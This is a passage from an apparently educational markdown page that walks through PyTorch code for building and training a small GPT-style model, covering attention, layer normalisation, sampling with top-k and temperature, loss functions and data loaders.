queries = queries.view(b, num_tokens, self.num_heads, self.head_dim)
|
|
||||||
|
|
||||||
# Transpose: (b, num_tokens, num_heads, head_dim) -> (b, num_heads, num_tokens, head_dim)
|
|
||||||
keys = keys.transpose(1, 2)
|
|
||||||
queries = queries.transpose(1, 2)
|
|
||||||
values = values.transpose(1, 2)
|
|
||||||
|
|
||||||
# Compute scaled dot-product attention (aka self-attention) with a causal mask
|
|
||||||
attn_scores = queries @ keys.transpose(2, 3) # Dot product for each head
|
|
||||||
|
|
||||||
# Original mask truncated to the number of tokens and converted to boolean
|
|
||||||
mask_bool = self.mask.bool()[:num_tokens, :num_tokens]
|
|
||||||
|
|
||||||
# Use the mask to fill attention scores
|
|
||||||
attn_scores.masked_fill_(mask_bool, -torch.inf)
|
|
||||||
|
|
||||||
attn_weights = torch.softmax(attn_scores / keys.shape[-1]**0.5, dim=-1)
|
|
||||||
attn_weights = self.dropout(attn_weights)
|
|
||||||
|
|
||||||
# Shape: (b, num_tokens, num_heads, head_dim)
|
|
||||||
context_vec = (attn_weights @ values).transpose(1, 2)
|
|
||||||
|
|
||||||
# Combine heads, where self.d_out = self.num_heads * self.head_dim
|
|
||||||
context_vec = context_vec.reshape(b, num_tokens, self.d_out)
|
|
||||||
context_vec = self.out_proj(context_vec) # optional projection
|
|
||||||
|
|
||||||
return context_vec
|
|
||||||
|
|
||||||
|
|
||||||
class LayerNorm(nn.Module):
|
|
||||||
def __init__(self, emb_dim):
|
|
||||||
super().__init__()
|
|
||||||
self.eps = 1e-5
|
|
||||||
self.scale = nn.Parameter(torch.ones(emb_dim))
|
|
||||||
self.shift = nn.Parameter(torch.zeros(emb_dim))
|
|
||||||
|
|
||||||
def forward(self, x):
|
|
||||||
mean = x.mean(dim=-1, keepdim=True)
|
|
||||||
var = x.var(dim=-1, keepdim=True, unbiased=False)
|
|
||||||
norm_x = (x - mean) / torch.sqrt(var + self.eps)
|
|
||||||
return self.scale * norm_x + self.shift
|
|
||||||
|
|
||||||
|
|
||||||
class GELU(nn.Module):
|
|
||||||
def __init__(self):
|
|
||||||
super().__init__()
|
|
||||||
|
|
||||||
def forward(self, x):
|
|
||||||
return 0.5 * x * (1 + torch.tanh(
|
|
||||||
torch.sqrt(torch.tensor(2.0 / torch.pi)) *
|
|
||||||
(x + 0.044715 * torch.pow(x, 3))
|
|
||||||
))
|
|
||||||
|
|
||||||
|
|
||||||
class FeedForward(nn.Module):
|
|
||||||
def __init__(self, cfg):
|
|
||||||
super().__init__()
|
|
||||||
self.layers = nn.Sequential(
|
|
||||||
nn.Linear(cfg["emb_dim"], 4 * cfg["emb_dim"]),
|
|
||||||
GELU(),
|
|
||||||
nn.Linear(4 * cfg["emb_dim"], cfg["emb_dim"]),
|
|
||||||
)
|
|
||||||
|
|
||||||
def forward(self, x):
|
|
||||||
return self.layers(x)
|
|
||||||
|
|
||||||
|
|
||||||
class TransformerBlock(nn.Module):
|
|
||||||
def __init__(self, cfg):
|
|
||||||
super().__init__()
|
|
||||||
self.att = MultiHeadAttention(
|
|
||||||
d_in=cfg["emb_dim"],
|
|
||||||
d_out=cfg["emb_dim"],
|
|
||||||
context_length=cfg["context_length"],
|
|
||||||
num_heads=cfg["n_heads"],
|
|
||||||
dropout=cfg["drop_rate"],
|
|
||||||
qkv_bias=cfg["qkv_bias"])
|
|
||||||
self.ff = FeedForward(cfg)
|
|
||||||
self.norm1 = LayerNorm(cfg["emb_dim"])
|
|
||||||
self.norm2 = LayerNorm(cfg["emb_dim"])
|
|
||||||
self.drop_shortcut = nn.Dropout(cfg["drop_rate"])
|
|
||||||
|
|
||||||
def forward(self, x):
|
|
||||||
# Shortcut connection for attention block
|
|
||||||
shortcut = x
|
|
||||||
x = self.norm1(x)
|
|
||||||
x = self.att(x) # Shape [batch_size, num_tokens, emb_size]
|
|
||||||
x = self.drop_shortcut(x)
|
|
||||||
x = x + shortcut # Add the original input back
|
|
||||||
|
|
||||||
# Shortcut connection for feed-forward block
|
|
||||||
shortcut = x
|
|
||||||
x = self.norm2(x)
|
|
||||||
x = self.ff(x)
|
|
||||||
x = self.drop_shortcut(x)
|
|
||||||
x = x + shortcut # Add the original input back
|
|
||||||
|
|
||||||
return x
|
|
||||||
|
|
||||||
|
|
||||||
class GPTModel(nn.Module):
|
|
||||||
def __init__(self, cfg):
|
|
||||||
super().__init__()
|
|
||||||
self.tok_emb = nn.Embedding(cfg["vocab_size"], cfg["emb_dim"])
|
|
||||||
self.pos_emb = nn.Embedding(cfg["context_length"], cfg["emb_dim"])
|
|
||||||
self.drop_emb = nn.Dropout(cfg["drop_rate"])
|
|
||||||
|
|
||||||
self.trf_blocks = nn.Sequential(
|
|
||||||
*[TransformerBlock(cfg) for _ in range(cfg["n_layers"])])
|
|
||||||
|
|
||||||
self.final_norm = LayerNorm(cfg["emb_dim"])
|
|
||||||
self.out_head = nn.Linear(cfg["emb_dim"], cfg["vocab_size"], bias=False)
|
|
||||||
|
|
||||||
def forward(self, in_idx):
|
|
||||||
batch_size, seq_len = in_idx.shape
|
|
||||||
tok_embeds = self.tok_emb(in_idx)
|
|
||||||
pos_embeds = self.pos_emb(torch.arange(seq_len, device=in_idx.device))
|
|
||||||
x = tok_embeds + pos_embeds # Shape [batch_size, num_tokens, emb_size]
|
|
||||||
x = self.drop_emb(x)
|
|
||||||
x = self.trf_blocks(x)
|
|
||||||
x = self.final_norm(x)
|
|
||||||
logits = self.out_head(x)
|
|
||||||
return logits
|
|
||||||
```
|
|
||||||
|
|
||||||
</details>
|
|
||||||
|
|
||||||
```python
|
|
||||||
# Download contents to train the data with
|
|
||||||
import os
|
|
||||||
import urllib.request
|
|
||||||
|
|
||||||
file_path = "the-verdict.txt"
|
|
||||||
url = "https://raw.githubusercontent.com/rasbt/LLMs-from-scratch/main/ch02/01_main-chapter-code/the-verdict.txt"
|
|
||||||
|
|
||||||
if not os.path.exists(file_path):
|
|
||||||
with urllib.request.urlopen(url) as response:
|
|
||||||
text_data = response.read().decode('utf-8')
|
|
||||||
with open(file_path, "w", encoding="utf-8") as file:
|
|
||||||
file.write(text_data)
|
|
||||||
else:
|
|
||||||
with open(file_path, "r", encoding="utf-8") as file:
|
|
||||||
text_data = file.read()
|
|
||||||
|
|
||||||
total_characters = len(text_data)
|
|
||||||
tokenizer = tiktoken.get_encoding("gpt2")
|
|
||||||
total_tokens = len(tokenizer.encode(text_data))
|
|
||||||
|
|
||||||
print("Data downloaded")
|
|
||||||
print("Characters:", total_characters)
|
|
||||||
print("Tokens:", total_tokens)
|
|
||||||
|
|
||||||
# Model initialization
|
|
||||||
GPT_CONFIG_124M = {
|
|
||||||
"vocab_size": 50257, # Vocabulary size
|
|
||||||
"context_length": 256, # Shortened context length (orig: 1024)
|
|
||||||
"emb_dim": 768, # Embedding dimension
|
|
||||||
"n_heads": 12, # Number of attention heads
|
|
||||||
"n_layers": 12, # Number of layers
|
|
||||||
"drop_rate": 0.1, # Dropout rate
|
|
||||||
"qkv_bias": False # Query-key-value bias
|
|
||||||
}
|
|
||||||
|
|
||||||
torch.manual_seed(123)
|
|
||||||
model = GPTModel(GPT_CONFIG_124M)
|
|
||||||
model.eval()
|
|
||||||
print ("Model initialized")
|
|
||||||
|
|
||||||
|
|
||||||
# Functions to transform from tokens to ids and from to ids to tokens
|
|
||||||
def text_to_token_ids(text, tokenizer):
|
|
||||||
encoded = tokenizer.encode(text, allowed_special={'<|endoftext|>'})
|
|
||||||
encoded_tensor = torch.tensor(encoded).unsqueeze(0) # add batch dimension
|
|
||||||
return encoded_tensor
|
|
||||||
|
|
||||||
def token_ids_to_text(token_ids, tokenizer):
|
|
||||||
flat = token_ids.squeeze(0) # remove batch dimension
|
|
||||||
return tokenizer.decode(flat.tolist())
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
# Define loss functions
|
|
||||||
def calc_loss_batch(input_batch, target_batch, model, device):
|
|
||||||
input_batch, target_batch = input_batch.to(device), target_batch.to(device)
|
|
||||||
logits = model(input_batch)
|
|
||||||
loss = torch.nn.functional.cross_entropy(logits.flatten(0, 1), target_batch.flatten())
|
|
||||||
return loss
|
|
||||||
|
|
||||||
|
|
||||||
def calc_loss_loader(data_loader, model, device, num_batches=None):
|
|
||||||
total_loss = 0.
|
|
||||||
if len(data_loader) == 0:
|
|
||||||
return float("nan")
|
|
||||||
elif num_batches is None:
|
|
||||||
num_batches = len(data_loader)
|
|
||||||
else:
|
|
||||||
# Reduce the number of batches to match the total number of batches in the data loader
|
|
||||||
# if num_batches exceeds the number of batches in the data loader
|
|
||||||
num_batches = min(num_batches, len(data_loader))
|
|
||||||
for i, (input_batch, target_batch) in enumerate(data_loader):
|
|
||||||
if i < num_batches:
|
|
||||||
loss = calc_loss_batch(input_batch, target_batch, model, device)
|
|
||||||
total_loss += loss.item()
|
|
||||||
else:
|
|
||||||
break
|
|
||||||
return total_loss / num_batches
|
|
||||||
|
|
||||||
|
|
||||||
# Apply Train/validation ratio and create dataloaders
|
|
||||||
train_ratio = 0.90
|
|
||||||
split_idx = int(train_ratio * len(text_data))
|
|
||||||
train_data = text_data[:split_idx]
|
|
||||||
val_data = text_data[split_idx:]
|
|
||||||
|
|
||||||
torch.manual_seed(123)
|
|
||||||
|
|
||||||
train_loader = create_dataloader_v1(
|
|
||||||
train_data,
|
|
||||||
batch_size=2,
|
|
||||||
max_length=GPT_CONFIG_124M["context_length"],
|
|
||||||
stride=GPT_CONFIG_124M["context_length"],
|
|
||||||
drop_last=True,
|
|
||||||
shuffle=True,
|
|
||||||
num_workers=0
|
|
||||||
)
|
|
||||||
|
|
||||||
val_loader = create_dataloader_v1(
|
|
||||||
val_data,
|
|
||||||
batch_size=2,
|
|
||||||
max_length=GPT_CONFIG_124M["context_length"],
|
|
||||||
stride=GPT_CONFIG_124M["context_length"],
|
|
||||||
drop_last=False,
|
|
||||||
shuffle=False,
|
|
||||||
num_workers=0
|
|
||||||
)
|
|
||||||
|
|
||||||
|
|
||||||
# Sanity checks
|
|
||||||
if total_tokens * (train_ratio) < GPT_CONFIG_124M["context_length"]:
|
|
||||||
print("Not enough tokens for the training loader. "
|
|
||||||
"Try to lower the `GPT_CONFIG_124M['context_length']` or "
|
|
||||||
"increase the `training_ratio`")
|
|
||||||
|
|
||||||
if total_tokens * (1-train_ratio) < GPT_CONFIG_124M["context_length"]:
|
|
||||||
print("Not enough tokens for the validation loader. "
|
|
||||||
"Try to lower the `GPT_CONFIG_124M['context_length']` or "
|
|
||||||
"decrease the `training_ratio`")
|
|
||||||
|
|
||||||
print("Train loader:")
|
|
||||||
for x, y in train_loader:
|
|
||||||
print(x.shape, y.shape)
|
|
||||||
|
|
||||||
print("\nValidation loader:")
|
|
||||||
for x, y in val_loader:
|
|
||||||
print(x.shape, y.shape)
|
|
||||||
|
|
||||||
train_tokens = 0
|
|
||||||
for input_batch, target_batch in train_loader:
|
|
||||||
train_tokens += input_batch.numel()
|
|
||||||
|
|
||||||
val_tokens = 0
|
|
||||||
for input_batch, target_batch in val_loader:
|
|
||||||
val_tokens += input_batch.numel()
|
|
||||||
|
|
||||||
print("Training tokens:", train_tokens)
|
|
||||||
print("Validation tokens:", val_tokens)
|
|
||||||
print("All tokens:", train_tokens + val_tokens)
|
|
||||||
|
|
||||||
|
|
||||||
# Indicate the device to use
|
|
||||||
if torch.cuda.is_available():
|
|
||||||
device = torch.device("cuda")
|
|
||||||
elif torch.backends.mps.is_available():
|
|
||||||
device = torch.device("mps")
|
|
||||||
else:
|
|
||||||
device = torch.device("cpu")
|
|
||||||
|
|
||||||
print(f"Using {device} device.")
|
|
||||||
|
|
||||||
model.to(device) # no assignment model = model.to(device) necessary for nn.Module classes
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
# Pre-calculate losses without starting yet
|
|
||||||
torch.manual_seed(123) # For reproducibility due to the shuffling in the data loader
|
|
||||||
|
|
||||||
with torch.no_grad(): # Disable gradient tracking for efficiency because we are not training, yet
|
|
||||||
train_loss = calc_loss_loader(train_loader, model, device)
|
|
||||||
val_loss = calc_loss_loader(val_loader, model, device)
|
|
||||||
|
|
||||||
print("Training loss:", train_loss)
|
|
||||||
print("Validation loss:", val_loss)
|
|
||||||
|
|
||||||
|
|
||||||
# Functions to train the data
|
|
||||||
def train_model_simple(model, train_loader, val_loader, optimizer, device, num_epochs,
|
|
||||||
eval_freq, eval_iter, start_context, tokenizer):
|
|
||||||
# Initialize lists to track losses and tokens seen
|
|
||||||
train_losses, val_losses, track_tokens_seen = [], [], []
|
|
||||||
tokens_seen, global_step = 0, -1
|
|
||||||
|
|
||||||
# Main training loop
|
|
||||||
for epoch in range(num_epochs):
|
|
||||||
model.train() # Set model to training mode
|
|
||||||
|
|
||||||
for input_batch, target_batch in train_loader:
|
|
||||||
optimizer.zero_grad() # Reset loss gradients from previous batch iteration
|
|
||||||
loss = calc_loss_batch(input_batch, target_batch, model, device)
|
|
||||||
loss.backward() # Calculate loss gradients
|
|
||||||
optimizer.step() # Update model weights using loss gradients
|
|
||||||
tokens_seen += input_batch.numel()
|
|
||||||
global_step += 1
|
|
||||||
|
|
||||||
# Optional evaluation step
|
|
||||||
if global_step % eval_freq == 0:
|
|
||||||
train_loss, val_loss = evaluate_model(
|
|
||||||
model, train_loader, val_loader, device, eval_iter)
|
|
||||||
train_losses.append(train_loss)
|
|
||||||
val_losses.append(val_loss)
|
|
||||||
track_tokens_seen.append(tokens_seen)
|
|
||||||
print(f"Ep {epoch+1} (Step {global_step:06d}): "
|
|
||||||
f"Train loss {train_loss:.3f}, Val loss {val_loss:.3f}")
|
|
||||||
|
|
||||||
# Print a sample text after each epoch
|
|
||||||
generate_and_print_sample(
|
|
||||||
model, tokenizer, device, start_context
|
|
||||||
)
|
|
||||||
|
|
||||||
return train_losses, val_losses, track_tokens_seen
|
|
||||||
|
|
||||||
|
|
||||||
def evaluate_model(model, train_loader, val_loader, device, eval_iter):
|
|
||||||
model.eval()
|
|
||||||
with torch.no_grad():
|
|
||||||
train_loss = calc_loss_loader(train_loader, model, device, num_batches=eval_iter)
|
|
||||||
val_loss = calc_loss_loader(val_loader, model, device, num_batches=eval_iter)
|
|
||||||
model.train()
|
|
||||||
return train_loss, val_loss
|
|
||||||
|
|
||||||
|
|
||||||
def generate_and_print_sample(model, tokenizer, device, start_context):
|
|
||||||
model.eval()
|
|
||||||
context_size = model.pos_emb.weight.shape[0]
|
|
||||||
encoded = text_to_token_ids(start_context, tokenizer).to(device)
|
|
||||||
with torch.no_grad():
|
|
||||||
token_ids = generate_text(
|
|
||||||
model=model, idx=encoded,
|
|
||||||
max_new_tokens=50, context_size=context_size
|
|
||||||
)
|
|
||||||
decoded_text = token_ids_to_text(token_ids, tokenizer)
|
|
||||||
print(decoded_text.replace("\n", " ")) # Compact print format
|
|
||||||
model.train()
|
|
||||||
|
|
||||||
|
|
||||||
# Start training!
|
|
||||||
import time
|
|
||||||
start_time = time.time()
|
|
||||||
|
|
||||||
torch.manual_seed(123)
|
|
||||||
model = GPTModel(GPT_CONFIG_124M)
|
|
||||||
model.to(device)
|
|
||||||
optimizer = torch.optim.AdamW(model.parameters(), lr=0.0004, weight_decay=0.1)
|
|
||||||
|
|
||||||
num_epochs = 10
|
|
||||||
train_losses, val_losses, tokens_seen = train_model_simple(
|
|
||||||
model, train_loader, val_loader, optimizer, device,
|
|
||||||
num_epochs=num_epochs, eval_freq=5, eval_iter=5,
|
|
||||||
start_context="Every effort moves you", tokenizer=tokenizer
|
|
||||||
)
|
|
||||||
|
|
||||||
end_time = time.time()
|
|
||||||
execution_time_minutes = (end_time - start_time) / 60
|
|
||||||
print(f"Training completed in {execution_time_minutes:.2f} minutes.")
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
# Show graphics with the training process
|
|
||||||
import matplotlib.pyplot as plt
|
|
||||||
from matplotlib.ticker import MaxNLocator
|
|
||||||
import math
|
|
||||||
def plot_losses(epochs_seen, tokens_seen, train_losses, val_losses):
|
|
||||||
fig, ax1 = plt.subplots(figsize=(5, 3))
|
|
||||||
ax1.plot(epochs_seen, train_losses, label="Training loss")
|
|
||||||
ax1.plot(
|
|
||||||
epochs_seen, val_losses, linestyle="-.", label="Validation loss"
|
|
||||||
)
|
|
||||||
ax1.set_xlabel("Epochs")
|
|
||||||
ax1.set_ylabel("Loss")
|
|
||||||
ax1.legend(loc="upper right")
|
|
||||||
ax1.xaxis.set_major_locator(MaxNLocator(integer=True))
|
|
||||||
ax2 = ax1.twiny()
|
|
||||||
ax2.plot(tokens_seen, train_losses, alpha=0)
|
|
||||||
ax2.set_xlabel("Tokens seen")
|
|
||||||
fig.tight_layout()
|
|
||||||
plt.show()
|
|
||||||
|
|
||||||
# Compute perplexity from the loss values
|
|
||||||
train_ppls = [math.exp(loss) for loss in train_losses]
|
|
||||||
val_ppls = [math.exp(loss) for loss in val_losses]
|
|
||||||
# Plot perplexity over tokens seen
|
|
||||||
plt.figure()
|
|
||||||
plt.plot(tokens_seen, train_ppls, label='Training Perplexity')
|
|
||||||
plt.plot(tokens_seen, val_ppls, label='Validation Perplexity')
|
|
||||||
plt.xlabel('Tokens Seen')
|
|
||||||
plt.ylabel('Perplexity')
|
|
||||||
plt.title('Perplexity over Training')
|
|
||||||
plt.legend()
|
|
||||||
plt.show()
|
|
||||||
|
|
||||||
epochs_tensor = torch.linspace(0, num_epochs, len(train_losses))
|
|
||||||
plot_losses(epochs_tensor, tokens_seen, train_losses, val_losses)
|
|
||||||
|
|
||||||
|
|
||||||
torch.save({
|
|
||||||
"model_state_dict": model.state_dict(),
|
|
||||||
"optimizer_state_dict": optimizer.state_dict(),
|
|
||||||
},
|
|
||||||
"/tmp/model_and_optimizer.pth"
|
|
||||||
)
|
|
||||||
```
|
|
||||||
|
|
||||||
Let's see an explanation step by step
|
|
||||||
|
|
||||||
### Functions to transform text <--> ids
|
|
||||||
|
|
||||||
These are some simple functions that can be used to transform from texts from the vocabulary to ids and backwards. This is needed at the begging of the handling of the text and at the end fo the predictions:
|
|
||||||
|
|
||||||
```python
|
|
||||||
# Functions to transform from tokens to ids and from to ids to tokens
|
|
||||||
def text_to_token_ids(text, tokenizer):
|
|
||||||
encoded = tokenizer.encode(text, allowed_special={'<|endoftext|>'})
|
|
||||||
encoded_tensor = torch.tensor(encoded).unsqueeze(0) # add batch dimension
|
|
||||||
return encoded_tensor
|
|
||||||
|
|
||||||
def token_ids_to_text(token_ids, tokenizer):
|
|
||||||
flat = token_ids.squeeze(0) # remove batch dimension
|
|
||||||
return tokenizer.decode(flat.tolist())
|
|
||||||
```
|
|
||||||
|
|
||||||
### Generate text functions
|
|
||||||
|
|
||||||
In a previos section a function that just got the **most probable token** after getting the logits. However, this will mean that for each entry the same output is always going to be generated which makes it very deterministic.
|
|
||||||
|
|
||||||
The following `generate_text` function, will apply the `top-k` , `temperature` and `multinomial` concepts.
|
|
||||||
|
|
||||||
- The **`top-k`** means that we will start reducing to `-inf` all the probabilities of all the tokens expect of the top k tokens. So, if k=3, before making a decision only the 3 most probably tokens will have a probability different from `-inf`.
|
|
||||||
- The **`temperature`** means that every probability will be divided by the temperature value. A value of `0.1` will improve the highest probability compared with the lowest one, while a temperature of `5` for example will make it more flat. This helps to improve to variation in responses we would like the LLM to have.
|
|
||||||
- After applying the temperature, a **`softmax`** function is applied again to make all the reminding tokens have a total probability of 1.
|
|
||||||
- Finally, instead of choosing the token with the biggest probability, the function **`multinomial`** is applied to **predict the next token according to the final probabilities**. So if token 1 had a 70% of probabilities, token 2 a 20% and token 3 a 10%, 70% of the times token 1 will be selected, 20% of the times it will be token 2 and 10% of the times will be 10%.
|
|
||||||
|
|
||||||
```python
|
|
||||||
# Generate text function
|
|
||||||
def generate_text(model, idx, max_new_tokens, context_size, temperature=0.0, top_k=None, eos_id=None):
|
|
||||||
|
|
||||||
# For-loop is the same as before: Get logits, and only focus on last time step
|
|
||||||
for _ in range(max_new_tokens):
|
|
||||||
idx_cond = idx[:, -context_size:]
|
|
||||||
with torch.no_grad():
|
|
||||||
logits = model(idx_cond)
|
|
||||||
logits = logits[:, -1, :]
|
|
||||||
|
|
||||||
# New: Filter logits with top_k sampling
|
|
||||||
if top_k is not None:
|
|
||||||
# Keep only top_k values
|
|
||||||
top_logits, _ = torch.topk(logits, top_k)
|
|
||||||
min_val = top_logits[:, -1]
|
|
||||||
logits = torch.where(logits < min_val, torch.tensor(float("-inf")).to(logits.device), logits)
|
|
||||||
|
|
||||||
# New: Apply temperature scaling
|
|
||||||
if temperature > 0.0:
|
|
||||||
logits = logits / temperature
|
|
||||||
|
|
||||||
# Apply softmax to get probabilities
|
|
||||||
probs = torch.softmax(logits, dim=-1) # (batch_size, context_len)
|
|
||||||
|
|
||||||
# Sample from the distribution
|
|
||||||
idx_next = torch.multinomial(probs, num_samples=1) # (batch_size, 1)
|
|
||||||
|
|
||||||
# Otherwise same as before: get idx of the vocab entry with the highest logits value
|
|
||||||
else:
|
|
||||||
idx_next = torch.argmax(logits, dim=-1, keepdim=True) # (batch_size, 1)
|
|
||||||
|
|
||||||
if idx_next == eos_id: # Stop generating early if end-of-sequence token is encountered and eos_id is specified
|
|
||||||
break
|
|
||||||
|
|
||||||
# Same as before: append sampled index to the running sequence
|
|
||||||
idx = torch.cat((idx, idx_next), dim=1) # (batch_size, num_tokens+1)
|
|
||||||
|
|
||||||
return idx
|
|
||||||
```
|
|
||||||
|
|
||||||
> [!NOTE]
|
|
||||||
> There is a common alternative to `top-k` called [**`top-p`**](https://en.wikipedia.org/wiki/Top-p_sampling), also known as nucleus sampling, which instead of getting k samples with the most probability, it **organizes** all the resulting **vocabulary** by probabilities and **sums** them from the highest probability to the lowest until a **threshold is reached**.
|
|
||||||
>
|
|
||||||
> Then, **only those words** of the vocabulary will be considered according to their relative probabilities 
|
|
||||||
>
|
|
||||||
> This allows to not need to select a number of `k` samples, as the optimal k might be different on each case, but **only a threshold**.
|
|
||||||
>
|
|
||||||
> _Note that this improvement isn't included in the previous code._
|
|
||||||
|
|
||||||
> [!NOTE]
|
|
||||||
> Another way to improve the generated text is by using **Beam search** instead of the greedy search sued in this example.\
|
|
||||||
> Unlike greedy search, which selects the most probable next word at each step and builds a single sequence, **beam search keeps track of the top 𝑘 k highest-scoring partial sequences** (called "beams") at each step. By exploring multiple possibilities simultaneously, it balances efficiency and quality, increasing the chances of **finding a better overall** sequence that might be missed by the greedy approach due to early, suboptimal choices.
|
|
||||||
>
|
|
||||||
> _Note that this improvement isn't included in the previous code._
|
|
||||||
|
|
||||||
### Loss functions
|
|
||||||
|
|
||||||
The **`calc_loss_batch`** function calculates the cross entropy of the a prediction of a single batch.\
|
|
||||||
The **`calc_loss_loader`** gets the cross entropy of all the batches and calculates the **average cross entropy**.
|
|
||||||
|
|
||||||
```python
|
|
||||||
# Define loss functions
|
|
||||||
def calc_loss_batch(input_batch, target_batch, model, device):
|
|
||||||
input_batch, target_batch = input_batch.to(device), target_batch.to(device)
|
|
||||||
logits = model(input_batch)
|
|
||||||
loss = torch.nn.functional.cross_entropy(logits.flatten(0, 1), target_batch.flatten())
|
|
||||||
return loss
|
|
||||||
|
|
||||||
def calc_loss_loader(data_loader, model, device, num_batches=None):
|
|
||||||
total_loss = 0.
|
|
||||||
if len(data_loader) == 0:
|
|
||||||
return float("nan")
|
|
||||||
elif num_batches is None:
|
|
||||||
num_batches = len(data_loader)
|
|
||||||
else:
|
|
||||||
# Reduce the number of batches to match the total number of batches in the data loader
|
|
||||||
# if num_batches exceeds the number of batches in the data loader
|
|
||||||
num_batches = min(num_batches, len(data_loader))
|
|
||||||
for i, (input_batch, target_batch) in enumerate(data_loader):
|
|
||||||
if i < num_batches:
|
|
||||||
loss = calc_loss_batch(input_batch, target_batch, model, device)
|
|
||||||
total_loss += loss.item()
|
|
||||||
else:
|
|
||||||
break
|
|
||||||
return total_loss / num_batches
|
|
||||||
```
|
|
||||||
|
|
||||||
> [!NOTE]
|
|
||||||
> **Gradient clipping** is a technique used to enhance **training stability** in large neural networks by setting a **maximum threshold** for gradient magnitudes. When gradients exceed this predefined `max_norm`, they are scaled down proportionally to ensure that updates to the model’s parameters remain within a manageable range, preventing issues like exploding gradients and ensuring more controlled and stable training.
|
|
||||||
>
|
|
||||||
> _Note that this improvement isn't included in the previous code._
|
|
||||||
>
|
|
||||||
> Check the following example:
|
|
||||||
|
|
||||||
<figure><img src="../../images/image (6) (1).png" alt=""><figcaption></figcaption></figure>
|
|
||||||
|
|
||||||
### Loading Data
|
|
||||||
|
|
||||||
The functions `create_dataloader_v1` and `create_dataloader_v1` were already discussed in a previous section.
|
|
||||||
|
|
||||||
From here note how it's defined that 90% of the text is going to be used for training while the 10% will be used for validation and both sets are stored in 2 different data loaders.\
|
|
||||||
Note that some times part of the data set is also left for a testing set to evaluate better the performance of the model.
|
|
||||||
|
|
||||||
Both data loaders are using the same batch size, maximum length and stride and num workers (0 in this case).\
|
|
||||||
The main differences are the data used by each, and the the validators is not dropping the last neither shuffling the data is it's not needed for validation purposes.
|
|
||||||
|
|
||||||
Also the fact that **stride is as big as the context length**, means that there won't be overlapping between contexts used to train the data (reduces overfitting but also the training data set).
|
|
||||||
|
|
||||||
Moreover, note that the batch size in this case it 2 to divide the data in 2 batches, the main goal of this is to allow parallel processing and reduce the consumption per batch.
|
|
||||||
|
|
||||||
```python
|
|
||||||
train_ratio = 0.90
|
|
||||||
split_idx = int(train_ratio * len(text_data))
|
|
||||||
train_data = text_data[:split_idx]
|
|
||||||
val_data = text_data[split_idx:]
|
|
||||||
|
|
||||||
torch.manual_seed(123)
|
|
||||||
|
|
||||||
train_loader = create_dataloader_v1(
|
|
||||||
train_data,
|
|
||||||
batch_size=2,
|
|
||||||
max_length=GPT_CONFIG_124M["context_length"],
|
|
||||||
stride=GPT_CONFIG_124M["context_length"],
|
|
||||||
drop_last=True,
|
|
||||||
shuffle=True,
|
|
||||||
num_workers=0
|
|
||||||
)
|
|
||||||
|
|
||||||
val_loader = create_dataloader_v1(
|
|
||||||
val_data,
|
|
||||||
batch_size=2,
|
|
||||||
max_length=GPT_CONFIG_124M["context_length"],
|
|
||||||
stride=GPT_CONFIG_124M["context_length"],
|
|
||||||
drop_last=False,
|
|
||||||
shuffle=False,
|
|
||||||
num_workers=0
|
|
||||||
)
|
|
||||||
```
|
|
||||||
|
|
||||||
## Sanity Checks
|
|
||||||
|
|
||||||
The goal is to check there are enough tokens for training, shapes are the expected ones and get some info about the number of tokens used for training and for validation:
|
|
||||||
|
|
||||||
```python
|
|
||||||
# Sanity checks
|
|
||||||
if total_tokens * (train_ratio) < GPT_CONFIG_124M["context_length"]:
|
|
||||||
print("Not enough tokens for the training loader. "
|
|
||||||
"Try to lower the `GPT_CONFIG_124M['context_length']` or "
|
|
||||||
"increase the `training_ratio`")
|
|
||||||
|
|
||||||
if total_tokens * (1-train_ratio) < GPT_CONFIG_124M["context_length"]:
|
|
||||||
print("Not enough tokens for the validation loader. "
|
|
||||||
"Try to lower the `GPT_CONFIG_124M['context_length']` or "
|
|
||||||
"decrease the `training_ratio`")
|
|
||||||
|
|
||||||
print("Train loader:")
|
|
||||||
for x, y in train_loader:
|
|
||||||
print(x.shape, y.shape)
|
|
||||||
|
|
||||||
print("\nValidation loader:")
|
|
||||||
for x, y in val_loader:
|
|
||||||
print(x.shape, y.shape)
|
|
||||||
|
|
||||||
train_tokens = 0
|
|
||||||
for input_batch, target_batch in train_loader:
|
|
||||||
train_tokens += input_batch.numel()
|
|
||||||
|
|
||||||
val_tokens = 0
|
|
||||||
for input_batch, target_batch in val_loader:
|
|
||||||
val_tokens += input_batch.numel()
|
|
||||||
|
|
||||||
print("Training tokens:", train_tokens)
|
|
||||||
print("Validation tokens:", val_tokens)
|
|
||||||
print("All tokens:", train_tokens + val_tokens)
|
|
||||||
```
|
|
||||||
|
|
||||||
### Select device for training & pre calculations
|
|
||||||
|
|
||||||
The following code just select the device to use and calculates a training loss and validation loss (without having trained anything yet) as a starting point.
|
|
||||||
|
|
||||||
```python
|
|
||||||
# Indicate the device to use
|
|
||||||
|
|
||||||
if torch.cuda.is_available():
|
|
||||||
device = torch.device("cuda")
|
|
||||||
elif torch.backends.mps.is_available():
|
|
||||||
device = torch.device("mps")
|
|
||||||
else:
|
|
||||||
device = torch.device("cpu")
|
|
||||||
|
|
||||||
print(f"Using {device} device.")
|
|
||||||
|
|
||||||
model.to(device) # no assignment model = model.to(device) necessary for nn.Module classes
|
|
||||||
|
|
||||||
# Pre-calculate losses without starting yet
|
|
||||||
torch.manual_seed(123) # For reproducibility due to the shuffling in the data loader
|
|
||||||
|
|
||||||
with torch.no_grad(): # Disable gradient tracking for efficiency because we are not training, yet
|
|
||||||
train_loss = calc_loss_loader(train_loader, model, device)
|
|
||||||
val_loss = calc_loss_loader(val_loader, model, device)
|
|
||||||
|
|
||||||
print("Training loss:", train_loss)
|
|
||||||
print("Validation loss:", val_loss)
|
|
||||||
```
|
|
||||||
|
|
||||||
### Training functions
|
|
||||||
|
|
||||||
The function `generate_and_print_sample` will just get a context and generate some tokens in order to get a feeling about how good is the model at that point. This is called by `train_model_simple` on each step.
|
|
||||||
|
|
||||||
The function `evaluate_model` is called as frequently as indicate to the training function and it's used to measure the train loss and the validation loss at that point in the model training.
|
|
||||||
|
|
||||||
Then the big function `train_model_simple` is the one that actually train the model. It expects:
|
|
||||||
|
|
||||||
- The train data loader (with the data already separated and prepared for training)
|
|
||||||
- The validator loader
|
|
||||||
- The **optimizer** to use during training: This is the function that will use the gradients and will update the parameters to reduce the loss. In this case, as you will see, `AdamW` is used, but there are many more.
|
|
||||||
- `optimizer.zero_grad()` is called to reset the gradients on each round to not accumulate them.
|
|
||||||
